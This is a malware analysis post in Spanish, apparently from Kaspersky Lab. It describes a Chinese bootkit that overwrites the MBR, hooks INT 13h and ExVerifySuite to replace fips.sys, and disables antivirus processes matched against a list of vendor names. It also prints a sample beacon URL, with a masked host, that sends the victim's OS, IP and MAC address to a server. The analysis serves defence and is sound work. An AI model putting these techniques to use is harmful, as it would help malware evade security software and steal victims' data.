El bootkit chino

Hace poco descubrimos un nuevo bootkit, un programa malicioso que infecta el sector de arranque del disco duro. Kaspersky Lab lo detecta como Rookit.Win32.Fisp.a. Trojan-Downloader.NSIS.Agent.jd distribuye el bootkit. El troyano infecta los ordenadores de los usuarios que intentan descargar un clip de video de un sitio pornográfico falso de China.

Vale la pena recalcar que este troyano descargador (downloader) descarga otros programas maliciosos usando el motor NSIS y guarda todos los enlaces en el script NSIS respectivo.

Fragmento del script NSIS de Trojan-Downloader.NSIS.Agent.jd.

El dropper Rootkit.Win32.Fisp.a está entre los programas que descarga el troyano downloader. Este programa malicioso infecta el sector de arranque del disco duro. Específicamente, guarda el viejo MBR en el tercer sector y lo reemplaza con el suyo. Comenzando en el cuarto sector, instala un driver codificado y el código que falta.

Fragmento del inicio del disco duro infectado por Rootkit.Win32.Fisp.a.

El programa malicioso obtiene control del equipo tan pronto como se reinicia el ordenador infectado. Lo primero que hace es substituir la interrupción INT 13h modificando la tabla del vector de interrupción. Después el bootkit restaura el MBR original y continúa con el proceso de arranque normal.

Cuando se termina el arranque de una parte específica del sistema, el bootkit intercepta la función ExVerifySuite. El gancho instalado reemplaza el controlador del sistema fips.sys con el controlador malicioso escrito al inicio del disco duro en un formato codificado. Debemos recalcar que el sistema operativo no necesita el controlador fips.sys para funcionar bien, así que el sistema no colapsa cuando se lo reemplaza.

El controlador malicioso utiliza PsSetLoadImageNotifyRoutine para interceptar los procesos que se ejecutan. El gancho procesa el encabezamiento PE en la imagen que se carga viendo la sección “Seguridad” de la matriz “DataDirectory”. El controlador contiene una lista de cadenas (abajo) que se encuentran en los procesos de populares programas antivirus. Si cualquiera de estas cadenas se encuentra en un proceso, el controlador modifica el punto de entrada en la imagen cargada para que no pueda volver a funcionar con éxito.

Beike
Beijing Rising Information Technology
AVG Technologies
Trend Micro
BITDEFENDER LLC
Symantec Corporation
Kaspersky Lab
ESET, spol
Beijing Jiangmin
Kingsoft Software
360.cn
Keniu Network Technology (Beijing) Co
Qizhi Software (beijing) Co,

La función principal del controlador es penetrar en el proceso explorer.exe e inyectar una versión alternativa de Rootkit.Win32.Fisp.a que tiene funcionalidad de descargador. El programa malicioso envía una solicitud al servidor en la que comparte información sobre el sistema operativo de la víctima, su dirección IP, direcciones MAC, etc.

http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=none&g=none&k=a&h=62&i=2&j=0321-01

Ejemplo de la solicitud enviada al servidor.

Después, el programa malicioso descarga modificaciones de Trojan-Dropper.Win32.Vedio.dgs y Trojan-GameThief.Win32.OnLineGames.boas en el ordenador de su víctima.

La descripción de arriba se puede resumir en el siguiente diagrama:

Los productos Kaspersky Lab detectan y neutralizan Rootkit.Win32.Fisp.a.

Kaspersky Lab products successfully detect and neutralize Rootkit.Win32.Fisp.a.